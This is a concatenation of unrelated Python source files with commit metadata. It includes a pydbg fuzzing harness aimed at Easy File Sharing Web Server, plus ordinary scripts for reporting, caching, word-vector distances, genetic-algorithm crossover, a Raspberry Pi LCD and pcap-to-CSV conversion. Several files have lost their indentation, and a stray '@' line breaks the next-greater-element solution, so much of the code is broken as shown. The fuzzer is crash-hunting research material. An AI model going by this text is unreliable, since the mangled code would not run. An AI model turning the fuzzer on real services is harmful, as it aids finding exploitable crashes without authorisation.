    def start_debugger(self):
        try:
            self.dbg = pydbg()
            self.dbg.load(self.exe_path)
            self.pid = self.dbg.pid
        except pdx:
            print "[+] Can't open file, please check file path"
            sys.exit(1)
        except Exception as e:
            print "[+] Unknow error: ", str(e)
            sys.exit(1)
        # Register the access-violation callback, then enter the pydbg
        # event loop on this thread.
        self.dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, check_access_validation)
        self.dbg.run()
exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
Fuzzer(exe_path) | Python | 0.000001 | |
2199f4c5ed563200d555315b9a8575e00486e667 | Add a simple script to generate monthly confirmed / fixed counts | script/confirmed-fixed-monthly-breakdown.py | script/confirmed-fixed-monthly-breakdown.py | #!/usr/bin/python
# A script to draw graphs showing the number of confirmed reports
# created each month, and those of which that have been fixed. This
# script expects to find a file called 'problems.csv' in the current
# directory which should be generated by:
#
# DIR=`pwd` rake data:create_problem_spreadsheet
import csv
import datetime
from collections import defaultdict
import itertools
status_types = ('confirmed', 'fixed')
counts = {}
for status_type in status_types:
counts[status_type] = defaultdict(int)
today = datetime.date.today()
latest_month = earliest_month = (today.year, today.month)
maximum_count = -1
with open('problems.csv') as fp:
reader = csv.DictReader(fp, delimiter=',', quotechar='"')
for row in reader:
d = datetime.datetime.strptime(row['Created'],
'%H:%M %d %b %Y')
ym = (d.year, d.month)
earliest_month = min(earliest_month, ym)
if row['Status'] == 'confirmed':
counts['confirmed'][ym] += 1
elif row['Status'] == 'fixed':
counts['fixed'][ym] += 1
maximum_count = max(maximum_count, counts['fixed'][ym], counts['confirmed'][ym])
def months_between(earlier, later):
    """Yield (year, month) tuples from *earlier* up to and including *later*.

    Both endpoints are (year, month) tuples.  *earlier* is always yielded
    at least once, even if it already lies past *later*.
    """
    year, month = earlier
    while True:
        yield year, month
        # Advance one calendar month, rolling over at December.
        year, month = (year + 1, 1) if month == 12 else (year, month + 1)
        if (year, month) > later:
            return
all_months = list(months_between(earliest_month, latest_month))
months = len(all_months)
# Make sure that there's at least a zero count for each month we're
# considering:
for d in counts.values():
for ym in all_months:
d[ym] += 0
with open('monthly-breakdown.csv', 'w') as fp:
writer = csv.writer(fp)
writer.writerow(['Month', 'Confirmed', 'Fixed'])
for ym in all_months:
writer.writerow(["%d-%02d" % (ym[0], ym[1]),
counts['confirmed'][ym],
counts['fixed'][ym]])
| Python | 0 | |
417f1832dbb6a1d0742b2f01d56429139f8885ef | add conversion script | scripts/conversionScripts/toValidationPP.py | scripts/conversionScripts/toValidationPP.py | # Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import xml.etree.ElementTree as ET
import xml.dom.minidom as pxml
import os
def convert(tree,fileName=None):
  """
    Converts input files to be compatible with merge request #1583:
    the Validation PostProcessor now carries its algorithm in the
    'subType' attribute instead of a dedicated child node such as
    'Probabilistic', which is removed.
    @ In, tree, xml.etree.ElementTree.ElementTree object, the contents of a RAVEN input file
    @ In, fileName, the name for the raven input file
    @Out, tree, xml.etree.ElementTree.ElementTree object, the modified RAVEN input file
  """
  root = tree.getroot()
  modelsNode = root.find('Models')
  converted = False
  # Fold each Validation PostProcessor's 'Probabilistic' child tag into
  # its 'subType' attribute.
  if modelsNode is not None:
    for postProcessor in modelsNode.findall('PostProcessor'):
      if postProcessor.get('subType') != 'Validation':
        continue
      probNode = postProcessor.find('Probabilistic')
      if probNode is None:
        continue
      postProcessor.set('subType', probNode.tag.strip())
      postProcessor.remove(probNode)
      converted = True
  if not converted:
    return tree
  testInfo = root.find('TestInfo')
  if testInfo is not None:
    # Record the conversion in the <revisions> history, creating that
    # node first if the input file does not have one yet.
    revisionsNode = testInfo.find('revisions')
    newRevisions = revisionsNode is None
    if newRevisions:
      revisionsNode = ET.Element('revisions')
    entry = ET.Element('revision')
    entry.attrib['author'] = 'wangc'
    entry.attrib['date'] = '2021-09-28'
    entry.text = 'Convert Validation PostProcessor: subType will be replaced with the Probabilistic node tag, and Probabilistic node is removed'
    revisionsNode.append(entry)
    if newRevisions:
      testInfo.append(revisionsNode)
  return tree
if __name__=='__main__':
import convert_utils
import sys
convert_utils.standardMain(sys.argv,convert)
| Python | 0.000001 | |
bbae3e9fee30634a659276732f16a883500e8f45 | Create memcache.py | cutout/cache/memcache.py | cutout/cache/memcache.py | # -*- coding: utf-8 -*-
import os
import re
import tempfile
from time import time
from .basecache import BaseCache
from .posixemulation import rename, _items
try:
import cPickle as pickle
except ImportError:
import pickle
try:
from hashlib import md5
except ImportError:
from md5 import new as md5
class MemCache(BaseCache):
    """Simple memory cache for single process environments. This class exists
    mainly for the development server and is not 100% thread safe. It tries
    to use as many atomic operations as possible and no locks for simplicity
    but it could happen under heavy load that keys are added multiple times.
    :param threshold: the maximum number of items the cache stores before
        it starts deleting some.
    :param default_timeout: the default timeout that is used if no timeout is
        specified on :meth:`~BaseCache.set`.
    """
    def __init__(self, threshold=500, default_timeout=300):
        BaseCache.__init__(self, default_timeout)
        # key -> (expiry timestamp, pickled value)
        self._cache = {}
        self.clear = self._cache.clear
        self._threshold = threshold
    def _prune(self):
        # Drop expired entries plus every third entry to get back under
        # the threshold.  bugfix: iterate over a snapshot -- popping from
        # the dict while iterating items() raises RuntimeError on Python 3.
        if len(self._cache) > self._threshold:
            now = time()
            for idx, (key, (expires, _)) in enumerate(list(self._cache.items())):
                if expires <= now or idx % 3 == 0:
                    self._cache.pop(key, None)
    def get(self, key):
        """Return the cached value, or None if missing or expired."""
        now = time()
        expires, value = self._cache.get(key, (0, None))
        # bugfix: compare against the timestamp taken above; the original
        # assigned `now` and then called time() a second time instead.
        if expires > now:
            return pickle.loads(value)
    def set(self, key, value, timeout=None):
        if timeout is None:
            timeout = self.default_timeout
        self._prune()
        self._cache[key] = (time() + timeout, pickle.dumps(value,
            pickle.HIGHEST_PROTOCOL))
    def add(self, key, value, timeout=None):
        # Like set(), but keeps any existing entry for `key` intact.
        if timeout is None:
            timeout = self.default_timeout
        if len(self._cache) > self._threshold:
            self._prune()
        item = (time() + timeout, pickle.dumps(value,
            pickle.HIGHEST_PROTOCOL))
        self._cache.setdefault(key, item)
    def delete(self, key):
        self._cache.pop(key, None)
| Python | 0.000001 | |
4fad6f5671d7957371db9d5bbdf9e65960a779b8 | output pairwise distances | pairdist.py | pairdist.py | #!/usr/bin/env python
"""Output pairwise distances between word vectors.
Prints lines with TAB-separated word indices (i, j) and the distance
of the corresponding word vectors under given metric.
Implementation avoids storing the distance matrix in memory, making
application to very large numbers of word vectors feasible.
Distances are assumed to be symmetric, either (i, j) or (j, i) is
included for any (i, j) pair, and self-distances (i, i) are excluded.
Indexing is zero-based by default.
The pairwise distances can be used e.g. as input for clustering tools.
"""
import sys
import logging
import numpy
import wvlib
from itertools import combinations, izip
from scipy.spatial import distance
# TODO: consider sklearn.neighbors.DistanceMetric if available
# selected distance metrics from scipy
metrics = {
'cosine' : distance.cosine,
'euclidean' : distance.euclidean,
'minkowski' : distance.minkowski,
# weighted Minkowski distance omitted, weight vector passing not implemented
'cityblock' : distance.cityblock,
'seuclidean' : distance.seuclidean,
'sqeuclidean' : distance.sqeuclidean,
'correlation' : distance.correlation,
'chebyshev' : distance.chebyshev,
'canberra' : distance.canberra,
'braycurtis' : distance.braycurtis,
'mahalanobis' : distance.mahalanobis,
# boolean vector distance metrics omitted, word vectors assumed continuous
# (hamming, jaccard, yule, matching, dice, kulsinski, rogerstanimoto,
# russellrao, sokalmichener, sokalsneath)
}
DEFAULT_METRIC='cosine'
def argparser():
    """Build the command-line parser for the pairwise-distance tool."""
    try:
        import argparse
    except ImportError:
        # Fall back to a bundled copy when stdlib argparse is unavailable.
        import compat.argparse as argparse
    ap=argparse.ArgumentParser()
    ap.add_argument('vectors', nargs=1, metavar='FILE', help='word vectors')
    ap.add_argument('-i', '--min-index', default=0, type=int,
                    help='index of first word (default 0)')
    ap.add_argument('-M', '--metric', default=DEFAULT_METRIC,
                    choices=sorted(metrics.keys()),
                    help='distance metric to apply')
    ap.add_argument('-n', '--normalize', default=False, action='store_true',
                    help='normalize vectors to unit length')
    ap.add_argument('-r', '--max-rank', metavar='INT', default=None,
                    type=int, help='only consider r most frequent words')
    ap.add_argument('-w', '--whiten', default=False, action='store_true',
                    help='normalize features to unit variance ')
    ap.add_argument('-W', '--words', default=False, action='store_true',
                    help='output words instead of indices')
    return ap
def process_options(args):
    """Parse command-line arguments and load the word vectors they name.

    Returns (words, vectors, options): the vocabulary, the corresponding
    vectors (optionally normalized/whitened), and the parsed options.
    Raises ValueError for an invalid --max-rank.
    """
    options = argparser().parse_args(args)

    if options.max_rank is not None and options.max_rank < 1:
        raise ValueError('max-rank must be >= 1')

    wv = wvlib.load(options.vectors[0], max_rank=options.max_rank)

    if options.normalize:
        logging.info('normalize vectors to unit length')
        wv.normalize()

    words, vectors = wv.words(), wv.vectors()

    if options.whiten:
        # bugfix: this module only imports scipy.spatial.distance, which
        # leaves the name `scipy` unbound -- referencing scipy.cluster.vq
        # raised NameError whenever --whiten was used.
        import scipy.cluster.vq
        logging.info('normalize features to unit variance')
        vectors = scipy.cluster.vq.whiten(vectors)

    return words, vectors, options
def make_dist(vectors, options):
    """Return (vectors, distance_function) for the configured metric.

    For 'cosine' the vectors are L2-normalized up front so each pairwise
    distance reduces to 1 - dot(u, v); for any other metric the vectors
    pass through unchanged and the function is looked up in the
    module-level `metrics` table.
    """
    if options.metric == 'cosine':
        # normalize once only
        unit = [v/numpy.linalg.norm(v) for v in vectors]
        return unit, lambda u, v: 1 - numpy.dot(u, v)
    return vectors, metrics[options.metric]
def main(argv=None):
    """Entry point: print one "i<TAB>j<TAB>distance" line per vector pair."""
    if argv is None:
        argv = sys.argv
    try:
        words, vectors, options = process_options(argv[1:])
    except Exception, e:
        # Exceptions with a message become an error line plus exit code 1;
        # message-less exceptions are re-raised with their full traceback.
        if str(e):
            print >> sys.stderr, 'Error: %s' % str(e)
            return 1
        else:
            raise

    m = options.min_index
    vectors, dist = make_dist(vectors, options)

    def index_str(i):
        # Emit either the numeric index or the corresponding word (-W).
        if not options.words:
            return str(i)
        else:
            return words[i-m]

    # Iterate index pairs and vector pairs in lockstep; only (i, j) with
    # i < j is produced (distances are symmetric, self-pairs excluded).
    for i_j, v_u in izip(combinations(xrange(m, m+len(vectors)), 2),
                         combinations(vectors, 2)):
        i, j, d = index_str(i_j[0]), index_str(i_j[1]), dist(v_u[0], v_u[1])
        print '%s\t%s\t%f' % (i, j, d)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| Python | 0.999999 | |
295af615c00a7b783e90c6979eab9decab7c1979 | add strategy.crossover module (WIP) | zephyrus/strategy/crossover.py | zephyrus/strategy/crossover.py | import random
class Crossover:
    """Base class for crossover operators.

    execute() copies both parent solutions and, with the configured
    probability, hands the copies to foo() (implemented by subclasses) to
    be recombined; otherwise the untouched copies are returned.
    """

    def __init__(self, probability):
        self.probability = probability

    def execute(self, *solutions):
        # TODO: validate solutions, 2, with len of at least 3
        first, second = solutions
        child_a, child_b = first[:], second[:]
        if random.random() <= self.probability:
            return self.foo(child_a, child_b)
        return child_a, child_b

    def foo(self, offspring1, offspring2):
        raise NotImplementedError
class OnePointCrossover(Crossover):
    # One-point crossover: cut both chromosomes at the same random index
    # and swap the tails.
    def __init__(self, probability):
        super().__init__(probability)
    def foo(self, offspring1, offspring2):
        # Cut strictly inside the chromosome (never at either end).
        index = random.randint(1, len(offspring1) - 2)
        slice1, slice2 = offspring1[index:], offspring2[index:]
        offspring1[index:] = slice2
        offspring2[index:] = slice1
        return offspring1, offspring2
class KPointCrossover(Crossover):
    # k-point crossover: split the chromosome into k+1 random segments and
    # swap every other segment between the two offspring.
    def __init__(self, probability, k):
        super().__init__(probability)
        self.k = k
    def _partitions(self, n, size):
        # Split `size` positions into n random non-empty parts and return
        # their (start, end) slices; shuffle randomizes the part lengths'
        # placement.
        # TODO: size must be >= n
        parts = []
        while n > 1:
            current = random.randint(1, size - n + 1)
            parts.append(current)
            n -= 1
            size -= current
        parts.append(size)
        random.shuffle(parts)
        slices = []
        index = 0
        for part in parts:
            slices.append((index, index + part))
            index += part
        return slices
    def foo(self, offspring1, offspring2):
        slices = self._partitions(self.k + 1, len(offspring1))
        # Swap the contents of every odd-numbered segment.
        for i, current_slice in enumerate(slices):
            if i % 2 == 1:
                start, end = current_slice
                slice1 = offspring1[start:end]
                slice2 = offspring2[start:end]
                offspring2[start:end] = slice1
                offspring1[start:end] = slice2
        return offspring1, offspring2
class UniformCrossover(Crossover):
    # Uniform crossover: each gene position is swapped independently with
    # probability `point_probability`.
    def __init__(self, probability, point_probability=0.5):
        super().__init__(probability)
        self.point_probability = point_probability
    def foo(self, offspring1, offspring2):
        for i in range(len(offspring1)):
            if random.random() <= self.point_probability:
                offspring1[i], offspring2[i] = offspring2[i], offspring1[i]
        return offspring1, offspring2
"""
class SBXCrossover(Crossover):
def __init__(self, probability, distribution_index):
self.probability = probability
self.distribution_index = distribution_index
def execute(solutions):
parent1, parent2 = solutions
offspring1 = parent1[:]
offspring2 = parent2[:]
if random() <= self.probability:
for i in range(len(offspring)):
pass
return offspring1, offspring2
"""
def get_unbounder_beta_bar():
    # TODO: unimplemented stub; the bounded counterpart lives below.
    pass
def get_bounded_beta_bar(x1, x2, x_lower, x_upper, di):
    # Draw the spread factor "beta bar" for a variable bounded by
    # [x_lower, x_upper]; di is the distribution index (see the
    # commented-out SBXCrossover sketch above).
    beta = 1 + (2 / (x2 - x1)) * min((x1 - x_lower), (x_upper - x2))
    alpha = 2 - pow(beta, -(di + 1))
    u = random.random()
    if u <= 1 / alpha:
        return pow(alpha * u, 1 / (di + 1))
    return pow(1 / (2 - alpha * u), 1 / (di + 1))
def unbounded_crossover(x1, x2, di):
    # NOTE(review): broken as written -- x_lower/x_upper are None, so the
    # arithmetic below raises TypeError on every call (see "# Fix this").
    x_lower, x_upper = None, None # Fix this
    beta = 1 + (2 / (x2 - x1)) * min((x1 - x_lower), (x_upper - x2))
    alpha = 2 - pow(beta, -(di + 1))
    u = random.random()
    if u <= .5:
        beta_bar = pow(alpha * u, 1 / (di + 1))
    else:
        beta_bar = pow(1 / (2 - alpha * u), 1 / (di + 1))
    y1 = .5 * ((x1 + x2) - beta_bar * abs(x2 - x1))
    y2 = .5 * ((x1 + x2) + beta_bar * abs(x2 - x1))
    return y1, y2
def bounded_crossover(x1, x2, x_lower, x_upper, di):
    """Recombine one decision variable bounded by [x_lower, x_upper].

    di is the distribution index; returns two children placed
    symmetrically around the parents' midpoint.
    """
    nearest_gap = min(x1 - x_lower, x_upper - x2)
    beta = 1 + (2 / (x2 - x1)) * nearest_gap
    alpha = 2 - pow(beta, -(di + 1))
    u = random.random()
    if u <= 1 / alpha:
        spread = pow(alpha * u, 1 / (di + 1))
    else:
        spread = pow(1 / (2 - alpha * u), 1 / (di + 1))
    lower_child = 0.5 * ((x1 + x2) - spread * abs(x2 - x1))
    upper_child = 0.5 * ((x1 + x2) + spread * abs(x2 - x1))
    return lower_child, upper_child
if __name__ == '__main__':
solution1 = [1, 2, 3, 4, 5]
solution2 = [5, 6, 7, 8, 9]
crossover = OnePointCrossover(1)
print(crossover.execute(solution1, solution2))
crossover = UniformCrossover(1)
print(crossover.execute(solution1, solution2))
crossover = KPointCrossover(1, 3)
print(crossover.execute(solution1, solution2))
print(bounded_crossover(2, 2.4, 1, 4, 1))
print(bounded_crossover(2, 2.4, 1, 4, 2))
print(bounded_crossover(2, 2.4, 1, 4, 10))
print(bounded_crossover(2, 2.4, 1, 4, 100))
| Python | 0 | |
3719a0371fa6fcc95ca65b6d759762f1f17a16be | Solving p025 | p025.py | p025.py | """
What is the first term in the Fibonacci sequence to contain 1000 digits?
"""
def solve_p025():
    """Return the 1-based index of the first Fibonacci term with 1000 digits."""
    for i, num in enumerate(fib_generator()):
        if len(str(num)) == 1000:
            # enumerate() is 0-based while Fibonacci terms count from 1, so
            # the answer is i + 1 (the original `i + i` doubled the index).
            return i + 1


def fib_generator():
    """Yield the Fibonacci numbers 1, 1, 2, 3, 5, 8, ... indefinitely."""
    prev = 1
    curr = 1
    yield prev
    yield curr
    while True:
        prev, curr = curr, prev + curr
        yield curr
if __name__ == '__main__':
print solve_p025() | Python | 0.999768 | |
bd2a70930ba67f3dd510b172fe4e00ddc2dc23c2 | Create voxelmodel.py | odvm/voxelmodel.py | odvm/voxelmodel.py | from panda3d.core import *
from odvm.quads import Quads
class VoxelModel(Geom):
    # A Panda3D Geom whose quad faces are managed by the odvm Quads
    # primitive.
    def __init__(self):
        # v3n3c4 vertex layout (position, normal, colour), static usage.
        Geom.__init__( self, GeomVertexData( 'vertices', GeomVertexFormat.get_v3n3c4(), Geom.UH_static ) )
        self.quads = Quads(self)
        self.add_primitive(self.quads)
    def add(self,p2s,i,j,k,c,p2i=0,p2j=0,p2k=0):
        # Add one box-shaped voxel at (i, j, k) with colour c.  All sizes
        # are powers of two: p2s scales the whole voxel, and p2i/p2j/p2k
        # give the log2 edge lengths along each axis.
        di = 1 << p2i
        dj = 1 << p2j
        dk = 1 << p2k
        # Six faces of the cuboid, each as (corner coordinates, colour).
        self.quads.add( 1<<p2s,i,j,k,
                        ( ( ( 0, 0, 0, di, dj, 0 ), c ),
                          ( ( 0, 0,-dk, 0, dj, 0 ), c ),
                          ( ( di, 0, 0, di, dj,-dk ), c ),
                          ( ( 0, 0,-dk, di, 0, 0 ), c ),
                          ( ( 0, dj,-dk, di, 0,-dk ), c ),
                          ( ( 0, dj, 0, di, dj,-dk ), c ) ) )
| Python | 0.000002 | |
b4d82c21995fb2b9e2afd93eea8849ded8b7d489 | Update next-greater-element-iii.py | Python/next-greater-element-iii.py | Python/next-greater-element-iii.py | # Time: O(logn) = O(1)
# Space: O(logn) = O(1)
# Given a positive 32-bit integer n, you need to find the smallest 32-bit integer
# which has exactly the same digits existing in the integer n and is greater in value than n.
# If no such positive 32-bit integer exists, you need to return -1.
@
# Example 1:
# Input: 12
# Output: 21
# Example 2:
# Input: 21
# Output: -1
class Solution(object):
    def nextGreaterElement(self, n):
        """
        Return the smallest 32-bit integer built from the same digits as n
        that is strictly greater than n, or -1 if none exists.

        :type n: int
        :rtype: int
        """
        # portability fix: the original used Python-2-only xrange and
        # indexed/reversed the list returned by map(); this version runs
        # identically on Python 2 and 3.
        digits = [int(c) for c in str(n)]
        k, l = -1, 0
        # k: rightmost position whose digit is smaller than its successor.
        for i in range(len(digits) - 1):
            if digits[i] < digits[i + 1]:
                k = i
        # Digits are non-increasing -> n is already the largest permutation.
        if k == -1:
            digits.reverse()
            return -1
        # l: rightmost digit greater than digits[k].
        for i in range(k + 1, len(digits)):
            if digits[i] > digits[k]:
                l = i
        # Swap them, then reverse the (descending) tail to minimize it.
        digits[k], digits[l] = digits[l], digits[k]
        digits[k + 1:] = digits[:k:-1]
        result = int("".join(map(str, digits)))
        # Reject results at or above 0x7FFFFFFF (kept from the original).
        return -1 if result >= 0x7FFFFFFF else result
| # Time: O(logn)
# Space: O(logn)
# Given a positive 32-bit integer n, you need to find the smallest 32-bit integer
# which has exactly the same digits existing in the integer n and is greater in value than n.
# If no such positive 32-bit integer exists, you need to return -1.
@
# Example 1:
# Input: 12
# Output: 21
# Example 2:
# Input: 21
# Output: -1
class Solution(object):
    def nextGreaterElement(self, n):
        """
        :type n: int
        :rtype: int
        """
        # NOTE: Python 2 specific (xrange; map() returning a plain list).
        digits = map(int, list(str(n)))
        k, l = -1, 0
        # k: rightmost position whose digit is smaller than its successor.
        for i in xrange(len(digits) - 1):
            if digits[i] < digits[i + 1]:
                k = i
        # Digits are non-increasing -> n is already the largest permutation.
        if k == -1:
            digits.reverse()
            return -1
        # l: rightmost digit greater than digits[k].
        for i in xrange(k + 1, len(digits)):
            if digits[i] > digits[k]:
                l = i
        # Swap them, then reverse the (descending) tail to minimize it.
        digits[k], digits[l] = digits[l], digits[k]
        digits[k + 1:] = digits[:k:-1]
        result = int("".join(map(str, digits)))
        # Results at or above 0x7FFFFFFF are treated as overflow.
        return -1 if result >= 0x7FFFFFFF else result
| Python | 0.000007 |
c6af2c9f11204dde361a9b1f8b14113e90a272b3 | add py prototype | 1/hazi.py | 1/hazi.py | #!/usr/bin/env python
import sys, codecs
class Node:
    """A search node: g is the path cost so far, h the heuristic estimate,
    and f = g + h the A* priority."""

    def __init__(self, name, g, h):
        self.name = name
        self.g = g
        self.h = h
        self.f = g + h
# Comparator ordering nodes by ascending f-score, for list.sort(cmp=...).
# NOTE(review): cmp() and sort's cmp= argument exist only on Python 2.
def sort_node(a, b):
    return cmp(a.f, b.f)
def name_in_list(y, l):
    """Return True if any node in l has .name equal to y."""
    return any(y == node.name for node in l)
def node_from_list(y, l):
    """Return the first node in l whose .name equals y (None if absent)."""
    return next((node for node in l if y == node.name), None)
def reconstruct_path(came_from,current_node):
    """Walk the came_from links back from current_node and return the full
    path from the start node to current_node (inclusive)."""
    path = [current_node]
    while current_node in came_from:
        current_node = came_from[current_node]
        path.append(current_node)
    path.reverse()
    return path
def a_star(start, end):
    """A* search from `start` to `end` over the module-level graph.

    Uses the global heuristic table `hn`, edge-cost table `gn` and
    predecessor map `came_from`; each iteration's open/closed lists are
    logged to output.txt in a lisp-like format.  Returns True when a
    solution line was written, False when the open list runs dry.
    """
    sock = codecs.open("output.txt", "w", "ISO-8859-2")
    openlist = [Node(start, 0, hn[start])]
    closedlist = []
    count = 0
    while len(openlist):
        # Cheapest f-score first (Python 2 comparator sort).
        openlist.sort(cmp=sort_node)
        sock.write("(:openlist %s" % count)
        for i in openlist:
            sock.write(" (%s %s)" % (i.f, i.name))
        sock.write(")\n")
        sock.write("(:closedlist %s" % count)
        for i in closedlist:
            sock.write(" (%s %s)" % (i.f, i.name))
        sock.write(")\n")
        x = openlist.pop(0)
        if x.name == end:
            sock.write("(:sol %s " % x.f)
            sock.write(" ".join(reconstruct_path(came_from,end)))
            sock.write(")\n")
            return True
        closedlist.append(x)
        # Expand every neighbour of x that is not already closed.
        for y in gn[x.name].keys():
            if name_in_list(y, closedlist):
                continue
            tentative_g_score = x.g + gn[x.name][y]
            tentative_is_better = False
            if not name_in_list(y, openlist):
                openlist.append(Node(y, tentative_g_score, hn[y]))
                tentative_is_better = True
            elif tentative_g_score < node_from_list(y, openlist).g:
                tentative_is_better = True
            # Remember the best-known predecessor of y.
            if tentative_is_better == True:
                came_from[y] = x.name
        count += 1
    return False
# Parser state: currently inside the (:hn ...) or (:gn ...) section.
inhn = False
ingn = False
start = None
end = None
# hn: heuristic estimate per node name; gn[a][b]: edge cost from a to b.
hn = {}
gn = {}
came_from = {}
# Input is lisp-like: (:start X), (:end Y), plus (:hn ...) / (:gn ...)
# blocks holding one "(name value)" / "(from to cost)" entry per line.
sock = codecs.open(sys.argv[1], "r", "ISO-8859-2")
for i in sock.readlines():
    line = i.strip()
    if line.startswith("(:start"):
        start = line[8:-1]
    elif line.startswith("(:end"):
        end = line[6:-1]
    elif line.startswith("(:hn"):
        inhn = True
    elif line.startswith("(:gn"):
        ingn = True
    elif line.startswith("("):
        # A data entry belonging to whichever section is open.
        if inhn:
            items = line[1:-1].split(' ')
            hn[items[0]] = int(items[1])
        elif ingn:
            items = line[1:-1].split(' ')
            if items[0] not in gn.keys():
                gn[items[0]] = {}
            gn[items[0]][items[1]] = int(items[2])
    elif line.startswith(")"):
        # A bare ")" closes the currently open section.
        if inhn:
            inhn = False
        elif ingn:
            ingn = False
sock.close()
a_star(start, end)
| Python | 0 | |
d9ed78369e21b79e022e685ecb39babbb0c17315 | Create test_lcd.py | Raspberry_py/test_lcd.py | Raspberry_py/test_lcd.py | #!/usr/bin/python
#import
import RPi.GPIO as GPIO
import time
# Define GPIO to LCD mapping
LCD_RS = 7
LCD_E = 8
LCD_D4 = 25
LCD_D5 = 24
LCD_D6 = 23
LCD_D7 = 18
# Define some device constants
LCD_WIDTH = 16 # Maximum characters per line
LCD_CHR = True
LCD_CMD = False
LCD_LINE_1 = 0x80 # LCD RAM address for the 1st line
LCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line
# Timing constants
E_PULSE = 0.0005
E_DELAY = 0.0005
def main():
    # Main program block
    GPIO.setwarnings(False)
    GPIO.setmode(GPIO.BCM) # Use BCM GPIO numbers
    GPIO.setup(LCD_E, GPIO.OUT) # E
    GPIO.setup(LCD_RS, GPIO.OUT) # RS
    GPIO.setup(LCD_D4, GPIO.OUT) # DB4
    GPIO.setup(LCD_D5, GPIO.OUT) # DB5
    GPIO.setup(LCD_D6, GPIO.OUT) # DB6
    GPIO.setup(LCD_D7, GPIO.OUT) # DB7
    # Initialise display
    lcd_init()
    # Cycle a fixed sequence of 16-character messages forever; the loop is
    # stopped with Ctrl-C (handled by the __main__ guard below).
    while True:
        # Send some test
        lcd_string("................",LCD_LINE_1)
        lcd_string("................",LCD_LINE_2)
        time.sleep(4)
        lcd_string("   Rob-Bat  OK  ",LCD_LINE_1)
        time.sleep(3)
        lcd_string("  Funcionando!  ",LCD_LINE_2)
        time.sleep(3)
        lcd_string("Computando......",LCD_LINE_1)
        lcd_string("................",LCD_LINE_2)
        time.sleep(2)
        lcd_string(" ESTOY VIVO !!  ",LCD_LINE_1)
        lcd_string("----------------",LCD_LINE_2)
        time.sleep(10);
def lcd_init():
    # Initialise display: 4-bit mode, left-to-right entry, display on,
    # 2 lines / font size, then clear.
    lcd_byte(0x33,LCD_CMD) # 110011 Initialise
    lcd_byte(0x32,LCD_CMD) # 110010 Initialise
    lcd_byte(0x06,LCD_CMD) # 000110 Cursor move direction
    lcd_byte(0x0C,LCD_CMD) # 001100 Display On,Cursor Off, Blink Off
    lcd_byte(0x28,LCD_CMD) # 101000 Data length, number of lines, font size
    lcd_byte(0x01,LCD_CMD) # 000001 Clear display
    time.sleep(E_DELAY)
def lcd_byte(bits, mode):
    # Send one byte to the display in 4-bit mode: high nibble first, then
    # low nibble, each latched by pulsing the Enable pin.
    # bits = data
    # mode = True  for character
    #        False for command
    GPIO.output(LCD_RS, mode) # RS selects command/character register
    # Drive each data pin straight from its bit.  The pin levels at the
    # Enable pulse are identical to the original clear-then-set sequence;
    # this just removes the eight duplicated if-blocks.
    # High bits
    for pin, mask in ((LCD_D4, 0x10), (LCD_D5, 0x20),
                      (LCD_D6, 0x40), (LCD_D7, 0x80)):
        GPIO.output(pin, bool(bits & mask))
    # Toggle 'Enable' pin
    lcd_toggle_enable()
    # Low bits
    for pin, mask in ((LCD_D4, 0x01), (LCD_D5, 0x02),
                      (LCD_D6, 0x04), (LCD_D7, 0x08)):
        GPIO.output(pin, bool(bits & mask))
    # Toggle 'Enable' pin
    lcd_toggle_enable()
def lcd_toggle_enable():
    # Toggle enable
    # Pulse E high for E_PULSE seconds (with settling delays either side)
    # so the display latches the data currently on the data pins.
    time.sleep(E_DELAY)
    GPIO.output(LCD_E, True)
    time.sleep(E_PULSE)
    GPIO.output(LCD_E, False)
    time.sleep(E_DELAY)
def lcd_string(message,line):
    # Send string to display
    # `line` is the RAM address of the target row (LCD_LINE_1/LCD_LINE_2);
    # the message is padded with spaces to the full 16-character width.
    message = message.ljust(LCD_WIDTH," ")
    lcd_byte(line, LCD_CMD)
    for i in range(LCD_WIDTH):
        lcd_byte(ord(message[i]),LCD_CHR)
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C is the expected way to stop the demo loop.
        pass
    finally:
        # Clear the display, show a parting message, release the pins.
        lcd_byte(0x01, LCD_CMD)
        lcd_string("Goodbye!",LCD_LINE_1)
        GPIO.cleanup()
| Python | 0.000004 | |
f30c542a9714574dbcee15ca7f7b4ca4cdb9d965 | add atexit01.py | trypython/stdlib/atexit01.py | trypython/stdlib/atexit01.py | # coding: utf-8
"""
atexitモジュールについてのサンプルです。
"""
import atexit
import sys
from trypython.common.commoncls import SampleBase
from trypython.common.commonfunc import pr
class Sample(SampleBase):
    def exec(self):
        #
        # The atexit module registers shutdown hooks: register() adds a
        # hook and unregister() removes one.
        #
        # Only functions that take no arguments can also be registered
        # via the @atexit.register decorator form.
        #
        atexit.register(Sample.exit_hook)
        pr('script', 'end')
        # sys.exit() still runs the registered atexit hooks on the way out.
        sys.exit(0)
    @staticmethod
    def exit_hook():
        # Registered explicitly in exec() above; runs at interpreter exit.
        pr('exit_hook', 'called')
    @staticmethod
    @atexit.register
    def exit_hook2():
        # Registered at class-definition time via the decorator form.
        pr('exit_hook2', 'called')
def go():
    obj = Sample()
    obj.exec()
if __name__ == '__main__':
go()
| Python | 0.000001 | |
926fe25c4995b5ab1d2464159223e2c403b72570 | use python command line tool with tshark to parse pcap and convert to csv | pcap2csv.py | pcap2csv.py | import os
import csv
# Run tshark over the capture and dump the ip.addr field of each packet
# into a temporary file.
cmd = "tshark -n -r {0} -T fields -Eheader=y -e ip.addr > tmp.csv"
os.system(cmd.format("wireshark_sample.pcap"))
# Collect the non-blank lines, splitting each on commas.
result = []
with open("tmp.csv", "r") as infile:
    for line in infile:
        if line == "\n":
            continue
        else:
            result.append(line.strip().split(","))
# NOTE(review): 'wb' is the Python 2 csv convention; under Python 3 this
# should be open('sample.csv', 'w', newline='').  Also consider replacing
# the trailing os.system("rm tmp.csv") with the portable os.remove().
with open('sample.csv', 'wb') as csvfile:
    writer = csv.writer(csvfile, quoting=csv.QUOTE_ALL)
    for line in result:
        writer.writerow(line)
